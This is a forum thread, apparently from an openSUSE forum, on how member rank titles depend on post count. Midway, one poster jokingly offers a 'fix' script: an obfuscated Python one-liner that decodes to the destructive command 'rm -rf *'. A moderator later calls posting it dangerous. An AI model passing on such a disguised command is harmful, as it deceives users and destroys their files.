member levels

Just a question and not sure if it goes here, but what’s with the “junior member”, “member” “senior member” and all that stuff? Is it based on how many posts like on ubuntuforums or by how long you’ve been on the forum or what? thanks.

i do not know why it is important but from what I could see it seems as follows:

0-30 posts jr member
30-100 posts member
100+ posts sr member

and maybe with a 1000 posts you will get to be a gold plated platinum super senior elite member, who knows?

stefan

and how many you need until you are geeko himself ?

> i do not know why it is important but from what I could see it seems as
> follows:

EXACTLY! and who cares…

oh, and WHY oh WHY should the trivial poster who does so only to build
him/herself up to (your) gold plated platinum super senior elite member!!

DenverD

This is part of vB, and it might help new users decide who they can trust, and who they can’t

Attaining “senior” at 100 posts is err…

Well let’s say I’m raking in 10,000-15,000 in certain other forum :stuck_out_tongue:

thanks for the reply’s. I was just wondering if they had to do with something like if a person was more active in the project or something, or if it just went on the amount of posts.

i’d say the rankings could be adjusted:

-taking in account membership time,
-user rankings, credits from other users for helping +1 / -1
-post numbers:

jr mbr 0-250
mbr 250-1000
sr mbr 1000+
elite guru with l33t skillz 2500+

stefan

some-guy wrote:

>
> This is part of vB, and it might help new users decide who they can
> trust, and who they can’t
>
>
You can always know whom to trust from their replies.

If only - unfortunately the world is full of nasty trolls and hobbitses that come and wreck havoc with their nasties!

In other words there are idiots out there who make nice posts and give completely false information in them just to stir problems.

so if i told you in a very believable way that this script would fix your problem at hand you would know immediately not to trust me?

python -c 'import os; os.system(“”.join([chr(ord(i)-1) for i in “sn!.sg!+”]))’

stefan

Besides, the Rep system exists, so you can know from that :wink:

hey that’s great, i did not notice that one before, well scratch that one from my list then! thanks for bringing it to my attention. I can’t find it in the user CP though for some reason.

stefan

Even well-intentioned advice can result in system issues. Buyer beware on any tech forum.

austingray1 wrote:
> Just a question and not sure if it goes here, but what’s with the
> “junior member”, “member” “senior member” and all that stuff? Is it
> based on how many posts like on ubuntuforums or by how long you’ve been
> on the forum or what? thanks.
>
>
It is based off post count.

Just a reminder: it’s dangerous to post potentially harmful code, even in jest. New users could actually try the code out :eek: I’ve been in touch with a poster in this thread for a humorous post with strange code in it. The member recommended to delete the post.

Cheers
Swerdna

In addition to what 69_rs_ss says,

> It is based off post count.

Yup and there are various levels that currently exist.

It does nothing more than give a rough indication of how active a user has
been in these forums. How any individual wants to interpret that
information is up to them.

I wonder how you can already have over 2k posts… you dirty spammer :smiley:

/me chuckles, privileges of being admin :cool: slip a few fivers this way & we will see what transpires :rolleyes:

Andy

so 2000+ posts will change rank from sr member to site admin, jay!